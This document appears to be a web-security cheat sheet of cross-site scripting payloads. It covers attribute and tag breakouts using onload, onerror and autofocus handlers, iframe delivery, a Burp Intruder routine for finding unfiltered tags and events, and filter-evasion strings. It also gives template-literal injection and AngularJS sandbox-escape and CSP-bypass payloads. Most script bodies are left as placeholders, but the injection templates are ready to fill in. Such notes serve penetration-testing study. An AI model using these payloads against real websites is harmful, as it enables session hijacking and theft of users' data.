

AccessKey Attribute

Set a global accessKey parameter. When the user presses the selected key, a script will be executed. Works only on Chrome


HTML Parameter

"><svg onload="...">
"><img src=. onerror="...">

//in case brackets are escaped, give onfocus event and focus on self
" autofocus onfocus="..." x="
" onmouseover="..." x="

Anchor href parameter poisoning



  1. Find vulnerable field

  2. Send request to Burp Intruder as following <§[payload]§> to find unfiltered tags

  3. Set the payload to a list of tags (see here) and start the attack

  4. After finding an unfiltered tag set the payload to <[tag]+§[payload]§="alert()">

  5. Set the payload to a list of events (see here) and start the attack

  6. After finding a suitable event the basic payload will be<[tag]+[event]="[js]">

Deliver through IFrame

<iframe src="<url>" onload="...">

Deliver with custom tag with autofocus

location = "<url>/?search=<xss id='x' onfocus='...' tabindex=1>#x";

Javascript Block

Escape from string such as var x = 'input'


Escape from strings with angled brackets encoded


Evade filters

\';<...>//                    //double quote filter
onerror=<func>;throw <arg>    //assign to error event.
&apos;-<...>-&apos;           //HTML escaped quotes

JS Template Literals

JS template strings are declared between backticks and use ${...} notation to evaluate code and inject the result in the string.

`Welcome, ${user.displayName}.`;

To execute code simply inject ${<...>} in the string

AngularJS Sandbox Escape

Sandbox escape by owerwriting the charAt method to join characters instead of evaluoating them one at a time


Code execution payloads

[1]|orderBy:toString().constructor.fromCharCode(120 61 <charcode payload>)=1  //120 61 is for 'x='

Content Security Policy Bypass

<input autofocus ng-focus="$event.path|orderBy:'[].constructor.from([1],<...>)'">

Last updated